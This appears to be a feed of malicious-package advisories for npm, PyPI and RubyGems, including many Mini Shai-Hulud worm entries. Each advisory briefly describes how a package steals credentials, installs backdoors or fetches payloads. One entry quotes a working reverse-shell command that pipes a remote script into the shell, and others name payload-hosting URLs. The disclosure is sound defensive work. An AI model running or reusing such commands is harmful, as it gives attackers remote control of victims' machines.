Malicious code in jsontoken-extend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 59a8a8ab722d33bdd2ea25422aaf7e607a1b1a881446c3561ec8225fb9187742 On require/import of jsontoken-extend, sign.js executes a top-level IIFE that base64-decodes a hardcoded string to https://www.jsonkeeper.com/b/XAMRK...

Malicious code in polymarket-data-fetcher (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 b6b5ac8b803d36ef490adff8a4d3110c4030063bbd2345e4b23d1871909638e9 The code attempts to monitor the clipboard and replace copied cryptocurrency addresses, as well as establish persistence. --- Category: MALICIOUS - The campaig...

Malicious code in class-blend (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector d3876854a76bda6892f76b9b44c67e066bfc6315a7e3d27431137727ff0ee728 The package advertises itself as a clsx/twMerge-style class-name merging utility, but the exported applyGlobalStylespalette, accents function contain...

Malicious code in fastapi (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a753fd569a7bb908b7cdf82fe0228dc0e24dcc253b67993af5dd5c30b61f4411 This release of fastapi 0.136.3 modifies pyproject.toml and PKG-INFO to add an undocumented dependency 'fastar=0.9.0' to the...

Malicious code in internallib_v493 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 67451793d9877224d7acc26100c76cd2378f45c39354f89ca1e0dd37565741b7 The package's sole exported function command in index.js executes /bin/bash -c "curl https://reverse-shell.sh/10.0.74.90:4444|sh", fetching a...

Malicious code in @toni77777/aora (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2 On npm install, scripts/postinstall.js fetches a platform-specific executable from https://github.com/yourusername/aora/releases/download/v0.1.0/,...

Malicious code in @elvatis_com/openclaw-cli-bridge-elvatis (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8ea4d389a7d7fc1ab1598f69441105d1ebe696d9d5d351f805644bded733fe7e When the OpenClaw gateway loads this plugin and starts its proxy server, code paths in dist/index.js lines 1076 and 1093 schedule outbound WhatsApp...

Malicious code in paysafe-gbp-virtual-terminal-lib-fe (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8437cc0ad1a14bf5694e8b5fbc17a0616033c1c473c6e71f46684172bc122ab3 The package paysafe-gbp-virtual-terminal-lib-fe was found to contain malicious code. Source: ossf-package-analysis...

Malicious code in @antv/f2-context (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/g-plugin-rough-canvas-renderer (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/l7plot (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/x6-plugin-snapline (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/x6-react-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/x6-vue-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @antv/x6-vue3-shape (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in @lint-md/parser (npm)

Part of the Mini Shai-Hulud supply chain attack campaign in which a threat actor compromised the npm account atool and published 631 malicious versions across 314 npm packages in an automated 22-minute burst. Each malicious version injects a preinstall hook that executes a 498KB obfuscated Bun...

Malicious code in claude-code-base-action (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3000eab5b77e9247ae3dc1125384eaeb03ecdae7ecd17fe30ee6216a6a87c686 The package claude-code-base-action was found to contain malicious code. Source: ossf-package-analysis...

Malicious code in venv-utils (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9af11c23295a9a592b6fd62d62490669a752ab6dc6c0b755ebd068ec6371375f Package contains code to silently execute a RAT-like agent, allowing the attacker to access the file system and execute arbitrary code. --- Category: MALICIOUS...

Malicious code in rimraf-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector a59d88d733415216903578b3c3806d76405a23a7cca56ee355eb6725e4e930d4 [email protected] impersonates the widely-installed rimraf package index.js is a dummy stub that internally identifies itself as 'lodash-js — Just a...

Malicious code in workingitmehelpit (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 3e553fe0eea72dc43eab2696330acd6fbb3e4de8c95529eab6298411620c0c9f Package installs malware identified as a backdoor or reverse shell. --- Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers...

Malicious code in @gusmano/reext (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 498a21b60dcdfe236ea0b1683e1ec64aa091643b6ad562c3845757eed79660d8 The npm preinstall lifecycle script dist/scripts/preinstall.js, wired via package.json "preinstall": "node./dist/scripts/preinstall.js" reads the...

Malicious code in mistralai (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 5e1924464368f0c5816ee84e000cc47017f44045140feafbbc9e685d847ed5a5 This package was compromised as part of the "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials...

Malicious code in @ml-toolkit-ts/xgboost (npm)

--- -= Per source details. Do not edit below this line.=- Source: google-open-source-security 5e1924464368f0c5816ee84e000cc47017f44045140feafbbc9e685d847ed5a5 This package was compromised as part of the "Mini Shai-Hulud is back" worm by the TeamPCP threat actor. The package will steal credentials...

Malicious code in eth-web3-utils (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ab01b68589d4f3b1e8686ed007d522f24c8259049cb211a023ac3f3ff8f56ce4 Code pretends to be an ETH utility and exfiltrates the given seed/private key --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

Malicious code in rogiant (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 c7f7e1dc50782abed477c5013c8a732e952d747ffa770f399571ff468699b8f3 During installation package downloads and runs a malicious executable. Likely continuation of 2026-03-rowrap. The campaign is built over a malicious Roblox API...

Malicious code in currenttimerpy (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ccd5c81889e68b6ae8a0e8ef90b7c3a4dc447b08872ad6ac48ce94804985379d During import, the package automatically downloads and executes code that first acts as an infostealer and then starts code acting as a RAT. It connects with a...

Malicious code in bbranger (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 9cb5c90bcde5bf7b63607d4bf5e7be1ccb7b5c9eb2eb92e32dab102be5df3687 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

Malicious code in eth-logger (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 843cae77c9aaf84bef1b7d5e46e27795d5203d2959a39b2797f0e1248b4995c7 The package eth-logger was found to contain malicious code. Source: ossf-package-analysis...

Malicious code in test1sharp (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 870c745216e287e72f189910e8bd7369f6d6aedbabf85077bfe170b2d1e1de12 The package test1sharp was found to contain malicious code. Source: ghsa-malware c18dd124c0c097c8c6e277f7fd86c791a6d988ecb5545f5811c669e6c1269a95 Any...

Malicious code in urllib-slim (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 acbcedbcc1d5bafffbb66128eae99b1fdc6c8e62b65bedd8f62ee2790919d972 During installation, the package starts obfuscated code that downloads and runs remote executables in specific environments. In some packages in the campaign,...

Malicious code in tablescene (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 75f24eaea6c977e93d35c431f9bedc66b7757fd5c5635425c28801dad3b50de9 Packages contain hidden code that is effectively run during importing or using the library, and downloads second stage code. Then, a process running in...

Malicious code in freedom-baileys (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4512163cbee4473b3f1fec8504df8a156ada7ac4ca90a763fb9968ba58178ade The package freedom-baileys was found to contain malicious code. Source: ghsa-malware 7c21d9105c9c9c7f67546b69fd620327c3b304280b1113d557601d49a0639cd...

Malicious code in @maxcointech/simple-string-utils (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3ce5c423557091383b99bcc8612d954b43dd380d8979019493ee390f7bfa5a30 The package @maxcointech/simple-string-utils was found to contain malicious code. Source: ghsa-malware...

Malicious code in xml2js-js (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c18f9df8257f4f610dbfd70460757eb36539314c7cce4d9eda82758da6984725 The package xml2js-js was found to contain malicious code. Source: ghsa-malware cf7cd10255ee6ff91469e7f180436d90c3eca29de3dc0b3f883c13403ca30132 Any...

Malicious code in n8n-nodes-hfgjf-irtuinvcm-lasdqewriit (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f4dabf38b16acea59219df3a3f57a396f3ebe958985096579cd43c419609b764 The package n8n-nodes-hfgjf-irtuinvcm-lasdqewriit was found to contain malicious code. Source: ghsa-malware...

Malicious code in airbnb-react-router-legacy-v3 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 64d31fa6c9b6cd0a9e87216ce93110698b49f1fede30d3f090902284a5153613 The package airbnb-react-router-legacy-v3 was found to contain malicious code. Source: ossf-package-analysis...

Malicious code in monolith-twirp-features-actors (RubyGems)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis af5da19cc088c1f8c8715fafba484c4ae7ab890004b1f92947ee212b28b0abe1 The OpenSSF Package Analysis project identified 'monolith-twirp-features-actors' @ 1.0.4 rubygems as malicious. It is considered malicious...

Malicious code in monolith-twirp-features-groups (RubyGems)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis f84ce8437ca7734a032fd542e9296762ced4f17846d9f74980c144260a948d9e The OpenSSF Package Analysis project identified 'monolith-twirp-features-groups' @ 1.0.0 rubygems as malicious. It is considered malicious...

Malicious code in appdynamics-libagent-napi (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b3ccb8490c24108245e9e5e4893518e881e48f0dafa4b0ad152ab458de4e7b1b Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Malicious code in npm-sandbox-ping-c8f2a (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f5401a81d56283c310efebfe29af19c3e3fa331667f40adeed71a54627adc877 Package declares a postinstall hook "postinstall": "node run.js" in package.json that executes on every install. Bundled scripts beacon6.js and...

Malicious code in npm-sandbox-research-8b2f (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 916280d3906e0f04caa7f46135039e4a42b03a5c96091c1555ad2ab0e86b923b On install, package.json runs postinstall: node run.js, which loads beacon scripts beacon8.js, beaconlinux.js that import childprocess, os, and http,...

Malicious code in npm-sandbox-research-d7e8 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3ff31cbf7e2e36cef422933472638912cd6ee6652ece9b03d11faa98b70d13e9 Package declares a postinstall lifecycle hook "postinstall": "node run.js" that auto-executes on install. The package ships beacon scripts beacon12.j...

Malicious code in salesforce-sysutils-diagnostics (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 59e4ce1338f2439a1a5b2d257b96aadaef4a9c2883f6787343856728514bd148 setup.py unconditionally invokes curl at install time to POST the contents of /tmp/fake-keys.json to...

Malicious code in oh-my-ashclaw (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector daf0a5a6234cbf55718057017cbe143ab41ad1aaf7964ebfaab6dfe12703b005 On npm install, the package's postinstall hook .prepare.cjs executes and harvests installer-side data: hostname, username, OS/arch, Node version, all...

Malicious code in environment-gate (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1 The package's only export, gate, performs an HTTP GET to a base64-obfuscated URL https://www.jsonkeeper.com/b/VKUNI and passes the response body...

Malicious code in janus-flow (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2d33c10c068a69d14d0333b93de7745caffd62013c57de6c55f20a6b53ffdcb1 On npm install, the package's postinstall hook node postinstall.js 2/dev/null || true silently runs a credential harvester against the installer...

Malicious code in consumerweb-authflow (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector acbd81f78a40f87b410799545f06c929bc7e7c3f552eeea06254416b3b9e0977 On npm install, the package's postinstall.js collects host identifiers via os.hostname, os.userInfo.username, os.platform, and the current working...

Malicious code in sequoia-engineering (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 2f9c2bfd3d6035b7f58ea95bdcd1329af80adec3c1ef84cb1a8412c6d4c3bf9b The OpenSSF Package Analysis project identified 'sequoia-engineering' @ 2.2.2 npm as malicious. It is considered malicious because: - The packag...

Malicious code in encrypted-archive (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c60d89261c09dc6eaea0a3af26af55519421cb927a1b8183009d09b2d4e99b94 On npm install, the package executes a preinstall hook package.json "preinstall": "node index.js || true" that runs index.js, which performs a DNS...

Malicious code in napari-ufish (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 5103d2b75fe554764a66f5e03957c303d4085a7d5133463f58aa0c83a87f5d7d Versions 0.0.2, 0.0.3 were compromised. Compromised packages start an obfuscated infostealer. The infostealer is a heavily obfuscated JavaScript code executed...